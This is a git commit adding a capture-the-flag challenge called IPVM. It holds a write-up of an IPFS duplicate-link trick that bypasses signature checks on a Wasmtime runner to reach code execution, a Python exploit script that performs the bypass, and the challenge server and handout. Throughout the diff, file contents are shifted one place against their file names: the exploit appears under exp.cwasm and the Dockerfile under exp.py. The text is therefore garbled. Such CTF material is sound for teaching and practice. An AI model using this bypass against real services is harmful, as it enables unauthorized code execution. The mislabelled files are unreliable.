feat: add misc-ipvm

Author: Mivik

misc-ipvm/README.md

@@ -0,0 +1,44 @@
+
+[简体中文](https://mivik.moe/2025/solution/tpctf-2025/#ipvm)
+
+This challenge is based on [IPFS](https://ipfs.tech), a decentralized file storage protocol. IPFS essentially splits a piece of data into many blocks, each uniquely identified by its hash value. The entire data is also identified by a hash value (the hash of all its sub-blocks concatenated and hashed again, see Merkle Tree), called CID. These blocks are then distributed across a P2P network. Ideally, you only need the CID of a data or file to recursively download all its sub-blocks from the network. Sounds cool! But in reality, P2P is far from being ideal; moreover, IPFS has various design flaws, see [How IPFS is broken](https://fiatjaf.com/d5031e5b.html). There're still a batch of people using IPFS, so yeah, it's up to you to decide.
+
+Back to this challenge. This challenge provides a WASM runtime platform based on IPFS. You can:
+
+- `build`: Upload a folder containing `wat` / `wasm` files (yes, IPFS supports folders), and the server will optimize and compile it, sign it, and return the compiled package CID.
+- `run`: Upload a package CID, and the server will verify the signature and run it.
+
+That's it, really simple. Where can the vulnerability even be?
+
+We know that the running process of wasm generally involves AOT compilation followed by local execution. Here `build` and `run` basically reproduce this process, which could lead to RCE because the output of `build` is essentially native code. If we can control the input to `run`, we can do whatever we want. However, the signature verification is quite annoying. If the output is not generated by a normal `build`, it won't pass the signature verification. Wasmtime, the runtime environment, is known for its security, making it difficult to exploit a 0day RCE from wasm. What should we do then?
+
+If you are carefully enough, you can spot an inconsistency in the way the server reads files from the folder. The first method is `ipfs_read`, which directly calls `ipfs cat <path>` to print the file content. Here, `path` can be either the CID itself (of course, this requires that the CID corresponds to a file rather than a folder) or a sub-file path of the CID (e.g., `CID/config.json`). The second method is to create a temporary folder and use `ipfs get <CID>` to download all files from the CID into this temporary folder.
+
+This inconsistency turns out to be the key to the vulnerability. After some digging, we know that IPFS uses [DAG-PB](https://ipld.io/docs/codecs/known/dag-pb/) to store directories. The protobuf definition is as follows:
+
+```protobuf
+message PBLink {
+  // binary CID (with no multibase prefix) of the target object
+  optional bytes Hash = 1;
+
+  // UTF-8 string name
+  optional string Name = 2;
+
+  // cumulative size of target object
+  optional uint64 Tsize = 3;
+}
+
+message PBNode {
+  // refs to other objects
+  repeated PBLink Links = 2;
+
+  // opaque user data
+  optional bytes Data = 1;
+}
+```
+
+An idea emerges: what if we have multiple `PBLink` with the same name in a `PBNode` (corresponding to multiple files with the same name in a folder)? It turns out that `ipfs cat` will return the content of the first file, while `ipfs get` will write all files sequentially, resulting in the last file's content being the final output. This inconsistency allows us to maliciously append a `main.cwasm` to the package generated by `build`. During signature verification, `ipfs cat` will work fine, but when we download and execute it using `ipfs get`, it will execute our malicious `main.cwasm`. This is how we achieve RCE.
+
+As for constructing malicious payload `main.cwasm`, I patched a compiled `main.cwasm` using IDA, injecting a segment of shellcode into the function execution part.
+
+> P.S. Use `protoc dag.proto --python_out .` to compile protobuf

misc-ipvm/exp/build/config.json

@@ -0,0 +1,4 @@
+{
+  "name": "test",
+  "entrypoint": "add"
+}

misc-ipvm/exp/build/main.wat

@@ -0,0 +1,5 @@
+(module
+    (func $add (export "add") (param $a i32) (param $b i32) (result i32)
+        (i32.add (local.get $a) (local.get $b))
+    )
+)

misc-ipvm/exp/dag.proto

@@ -0,0 +1,20 @@
+syntax = "proto3";
+
+message PBLink {
+  // binary CID (with no multibase prefix) of the target object
+  optional bytes Hash = 1;
+
+  // UTF-8 string name
+  optional string Name = 2;
+
+  // cumulative size of target object
+  optional uint64 Tsize = 3;
+}
+
+message PBNode {
+  // refs to other objects
+  repeated PBLink Links = 2;
+
+  // opaque user data
+  optional bytes Data = 1;
+}

misc-ipvm/exp/exp.cwasm

@@ -0,0 +1,33 @@
+from dag_pb2 import *
+from base58 import b58decode
+import subprocess as sp
+import requests as rq
+
+
+ip, port = '127.0.0.1 8000'.split()
+base = f"http://{ip}:{port}"
+ipfs = ["ipfs", "--api", f"/ip4/{ip}/tcp/{port}"]
+
+
+def add(path):
+    output = sp.check_output(ipfs + ["add", "-r", path]).decode().strip()
+    line = output.splitlines()[-1]
+    return line.split()[1]
+
+
+built = rq.post(f"{base}/build", json={"cid": add("build")}).json()
+output = sp.check_output(ipfs + ["block", "get", built["cid"]])
+
+node = PBNode()
+node.ParseFromString(output)
+
+exp = add("exp.cwasm")
+node.Links.insert(2, PBLink(Hash=b58decode(exp), Name="main.cwasm", Tsize=13483))
+
+p = sp.Popen(ipfs + ["block", "put", "--format=v0"], stdin=sp.PIPE, stdout=sp.PIPE)
+p.stdin.write(node.SerializeToString())
+p.stdin.close()
+modified = p.stdout.read().decode().strip()
+
+output = rq.post(f"{base}/run", json={"cid": modified, "args": "1"}).json()
+print(output)

misc-ipvm/exp/exp.py

@@ -0,0 +1,42 @@
+FROM debian:12-slim AS compiler
+
+RUN apt update && apt install -y gcc && rm -rf /var/lib/apt/lists/*
+
+COPY readflag.c /
+RUN gcc /readflag.c -o /readflag && rm /readflag.c
+
+FROM python:3.12-slim
+
+RUN apt update && apt install -y wget xz-utils && rm -rf /var/lib/apt/lists/*
+
+RUN wget https://dist.ipfs.tech/kubo/v0.33.2/kubo_v0.33.2_linux-amd64.tar.gz && \
+    tar xvf kubo_v0.33.2_linux-amd64.tar.gz && \
+    kubo/install.sh && \
+    rm -rf kubo_v0.33.2_linux-amd64.tar.gz kubo
+
+RUN wget https://github.com/WebAssembly/wabt/releases/download/1.0.36/wabt-1.0.36-ubuntu-20.04.tar.gz && \
+    tar xvf wabt-1.0.36-ubuntu-20.04.tar.gz && \
+    cp wabt-1.0.36/bin/wat2wasm /usr/local/bin/ && \
+    rm -rf wabt-1.0.36-ubuntu-20.04.tar.gz wabt-1.0.36
+
+RUN wget https://github.com/bytecodealliance/wasmtime/releases/download/v30.0.1/wasmtime-v30.0.1-x86_64-linux.tar.xz && \
+    tar xvf wasmtime-v30.0.1-x86_64-linux.tar.xz && \
+    cp wasmtime-v30.0.1-x86_64-linux/wasmtime /usr/local/bin/ && \
+    rm -rf wasmtime-v30.0.1-x86_64-linux.tar.xz wasmtime-v30.0.1-x86_64-linux
+
+RUN groupadd -r ctf && \
+    useradd -m -g ctf ctf && \
+    mkdir /app/ && \
+    chown -R ctf:ctf /app
+
+RUN pip3 install base58 pycryptodome "fastapi[standard]"
+COPY server.py index.html /app/
+
+COPY --chmod=600 flag /
+COPY --from=compiler /readflag /
+RUN chmod +s /readflag
+
+WORKDIR /app
+
+COPY --chmod=755 docker-entrypoint.sh /
+ENTRYPOINT ["/docker-entrypoint.sh"]

misc-ipvm/handout/Dockerfile

@@ -0,0 +1,18 @@
+services:
+  ipfs:
+    container_name: ipfs
+    image: ipfs/kubo:release
+    healthcheck:
+      test: sh -c "[ -f /data/ipfs/api ]"
+      interval: 1s
+      start_period: 5s
+
+  server:
+    container_name: server
+    image: ipvm
+    depends_on:
+      ipfs:
+        condition: service_healthy
+
+    ports:
+      - "8000:8000"

misc-ipvm/handout/docker-compose.yml

@@ -0,0 +1,3 @@
+#!/bin/bash
+
+su ctf -c "fastapi run server.py"

misc-ipvm/handout/docker-entrypoint.sh

@@ -0,0 +1 @@
+TPCTF{fakeflag}

misc-ipvm/handout/flag

@@ -0,0 +1,118 @@
+<!DOCTYPE html>
+<html lang="zh-CN">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>IPVM</title>
+    <link
+      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css"
+      rel="stylesheet"
+    />
+  </head>
+  <body>
+    <nav class="navbar navbar-dark bg-dark">
+      <div class="container-fluid">
+        <span class="navbar-brand mb-0 h1">🚀 IPVM 🚀</span>
+      </div>
+    </nav>
+
+    <div class="container mt-5">
+      <div class="row justify-content-center">
+        <div class="col-md-6">
+          <div class="input-group mb-3">
+            <input
+              type="text"
+              id="cid-input"
+              class="form-control"
+              placeholder="CID"
+              aria-label="CID"
+            />
+          </div>
+          <div class="input-group mb-3">
+            <input
+              type="text"
+              id="arg-input"
+              class="form-control"
+              placeholder="Arguments"
+              aria-label="Arguments"
+            />
+          </div>
+          <div class="d-grid gap-2 d-md-flex justify-content-md-end">
+            <button
+              id="build-btn"
+              class="btn btn-primary me-md-2"
+              type="button"
+            >
+              🔧 Build
+            </button>
+            <button id="run-btn" class="btn btn-success" type="button">
+              🚀 Run
+            </button>
+          </div>
+        </div>
+      </div>
+    </div>
+
+    <script>
+      const buildBtn = document.getElementById("build-btn");
+      const runBtn = document.getElementById("run-btn");
+      const cidInput = document.getElementById("cid-input");
+      const argInput = document.getElementById("arg-input");
+
+      buildBtn.addEventListener("click", async () => {
+        const cid = cidInput.value.trim();
+        if (!cid) {
+          alert("Please input CID");
+          return;
+        }
+
+        try {
+          const response = await fetch("/build", {
+            method: "POST",
+            headers: {
+              "Content-Type": "application/json",
+            },
+            body: JSON.stringify({ cid }),
+          });
+
+          if (!response.ok) {
+            throw new Error(await response.text());
+          }
+
+          const data = await response.json();
+          alert(`Build result: ${data.output}`);
+        } catch (error) {
+          alert("Build failed: " + error.message);
+        }
+      });
+
+      runBtn.addEventListener("click", async () => {
+        const cid = cidInput.value.trim();
+        const arg = argInput.value.trim();
+        if (!cid || !arg) {
+          alert("Please input CID and arguments");
+          return;
+        }
+
+        try {
+          const response = await fetch("/build", {
+            method: "POST",
+            headers: {
+              "Content-Type": "application/json",
+            },
+            body: JSON.stringify({ cid, arg }),
+          });
+
+          if (!response.ok) {
+            throw new Error(await response.text());
+          }
+
+          const data = await response.json();
+          alert(`Output: ${data.output}`);
+        } catch (error) {
+          alert("Failure: " + error.message);
+        }
+      });
+    </script>
+  </body>
+</html>

misc-ipvm/handout/index.html

@@ -0,0 +1,7 @@
+#include <unistd.h>
+int main() {
+  setuid(0);
+  char *newargv[] = {"/bin/cat", "/flag", NULL};
+  char *newenviron[] = {NULL};
+  execve("/bin/cat", newargv, newenviron);
+}

misc-ipvm/handout/readflag.c

@@ -0,0 +1,216 @@
+import asyncio
+import asyncio.subprocess as sp
+import httpx
+import os
+
+from base58 import BITCOIN_ALPHABET
+from contextlib import asynccontextmanager
+from fastapi import FastAPI, Request, HTTPException
+from fastapi.responses import StreamingResponse, FileResponse
+from pydantic import BaseModel, model_validator, AfterValidator
+from starlette.background import BackgroundTask
+from string import ascii_letters, digits
+from tempfile import TemporaryDirectory
+
+from Crypto.Signature import pkcs1_15
+from Crypto.Hash import SHA256
+from Crypto.PublicKey import RSA
+
+from typing import Annotated
+
+IPFS_API = "http://ipfs:5001"
+IPFS_API_MULTIADDR = "/dns4/ipfs/tcp/5001"
+
+key = RSA.generate(2048)
+
+
+@asynccontextmanager
+async def lifespan(app: FastAPI):
+    async with httpx.AsyncClient(base_url=IPFS_API) as client:
+        yield {"client": client}
+
+
+app = FastAPI(lifespan=lifespan)
+
+
+# ---- Reverse Proxy ----
+
+
+async def _reverse_proxy(request: Request):
+    client = request.state.client
+    url = httpx.URL(path=request.url.path, query=request.url.query.encode())
+    headers = [(k, v) for k, v in request.headers.raw if k != b"host"]
+    req = client.build_request(
+        request.method, url, headers=headers, content=request.stream()
+    )
+    r = await client.send(req, stream=True)
+    return StreamingResponse(
+        r.aiter_raw(),
+        status_code=r.status_code,
+        headers=r.headers,
+        background=BackgroundTask(r.aclose),
+    )
+
+
+app.add_route("/api/v0/{path:path}", _reverse_proxy, ["POST"])
+
+
+# ---- Main API ----
+
+
+class IPVMError(HTTPException):
+    def __init__(self, message: str):
+        super().__init__(status_code=400, detail=message)
+
+
+class Config(BaseModel):
+    name: str
+    author: str | None = None
+    version: str | None = None
+    description: str | None = None
+
+    entrypoint: str = "_start"
+
+    @model_validator(mode="after")
+    def verify(self):
+        if not (
+            all(c in (ascii_letters + "_") for c in self.entrypoint)
+            and 0 < len(self.entrypoint) <= 10
+        ):
+            raise ValueError("Invalid entrypoint")
+
+        return self
+
+
+def verify_cid(cid):
+    cs = cid.encode()
+    if not (all(c in BITCOIN_ALPHABET for c in cs) and len(cs) == 46):
+        raise ValueError("Invalid CID")
+
+    return cid
+
+
+Cid = Annotated[str, AfterValidator(verify_cid)]
+
+
+async def check_output(cmd, stdout=sp.PIPE, stderr=sp.DEVNULL, timeout=None, **kwargs):
+    proc = await sp.create_subprocess_exec(*cmd, stdout=stdout, stderr=stderr, **kwargs)
+    stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=timeout)
+    if proc.returncode != 0:
+        raise IPVMError(f"Command {cmd[0]} failed with return code {proc.returncode}")
+
+    return stdout
+
+
+async def ipfs_call(args):
+    return await check_output(["ipfs", "--api", IPFS_API_MULTIADDR, *args], timeout=30)
+
+
+async def ipfs_read(path):
+    return await ipfs_call(["cat", path])
+
+
+async def check_package(cid, allowed: set[str]):
+    content = (await ipfs_call(["ls", cid])).decode()
+    total_size = 0
+    for line in content.splitlines():
+        _, size, filename = line.split(maxsplit=2)
+        assert filename in allowed, f"Invalid file: {filename}"
+        total_size += int(size)
+
+    if total_size > 128 * 1024:
+        raise IPVMError("Package too large")
+
+
+class BuildRequest(BaseModel):
+    cid: Cid
+
+
+@app.post("/build")
+async def build_request(request: BuildRequest):
+    cid = request.cid
+    Config.model_validate_json(await ipfs_read(f"{cid}/config.json"))
+
+    await check_package(cid, {"config.json", "main.wat", "main.wasm"})
+
+    with TemporaryDirectory() as td:
+        await ipfs_call(["get", cid, "-o", td])
+        if os.path.exists(f"{td}/main.wat"):
+            await check_output(
+                ["wat2wasm", "main.wat", "-o", "main.wasm"],
+                cwd=td,
+                timeout=5,
+            )
+            os.remove(f"{td}/main.wat")
+
+        if not os.path.exists(f"{td}/main.wasm"):
+            raise IPVMError("No wasm file found")
+
+        await check_output(
+            ["wasmtime", "compile", "main.wasm"],
+            cwd=td,
+            timeout=5,
+        )
+        os.remove(f"{td}/main.wasm")
+
+        with open(f"{td}/main.cwasm", "rb") as f:
+            h = SHA256.new(f.read())
+        signature = pkcs1_15.new(key).sign(h)
+
+        with open(f"{td}/main.cwasm.sig", "wb") as f:
+            f.write(signature)
+
+        output = (await ipfs_call(["add", "-r", td])).decode()
+        line = output.strip().splitlines()[-1]
+        package_cid = line.split()[1]
+
+    return {
+        "cid": package_cid,
+    }
+
+
+class RunRequest(BaseModel):
+    cid: Cid
+    args: str = ""
+
+    @model_validator(mode="after")
+    def verify(self):
+        if not (all(a in (digits + " ") for a in self.args) and len(self.args) <= 20):
+            raise ValueError("Invalid args")
+
+        return self
+
+
+@app.post("/run")
+async def run_request(request: RunRequest):
+    cid = request.cid
+    config = Config.model_validate_json(await ipfs_read(f"{cid}/config.json"))
+
+    await check_package(cid, {"config.json", "main.cwasm", "main.cwasm.sig"})
+
+    signature = await ipfs_read(f"{cid}/main.cwasm.sig")
+    h = SHA256.new(await ipfs_read(f"{cid}/main.cwasm"))
+    pkcs1_15.new(key).verify(h, signature)
+
+    with TemporaryDirectory() as td:
+        await ipfs_call(["get", cid, "-o", td])
+        output = await check_output(
+            [
+                "wasmtime",
+                "run",
+                "--allow-precompiled",
+                "--invoke",
+                config.entrypoint,
+                "main.cwasm",
+                *request.args.split(),
+            ],
+            cwd=td,
+            timeout=5,
+        )
+
+    return {"output": output.decode()}
+
+
+@app.get("/")
+async def read_index():
+    return FileResponse("index.html")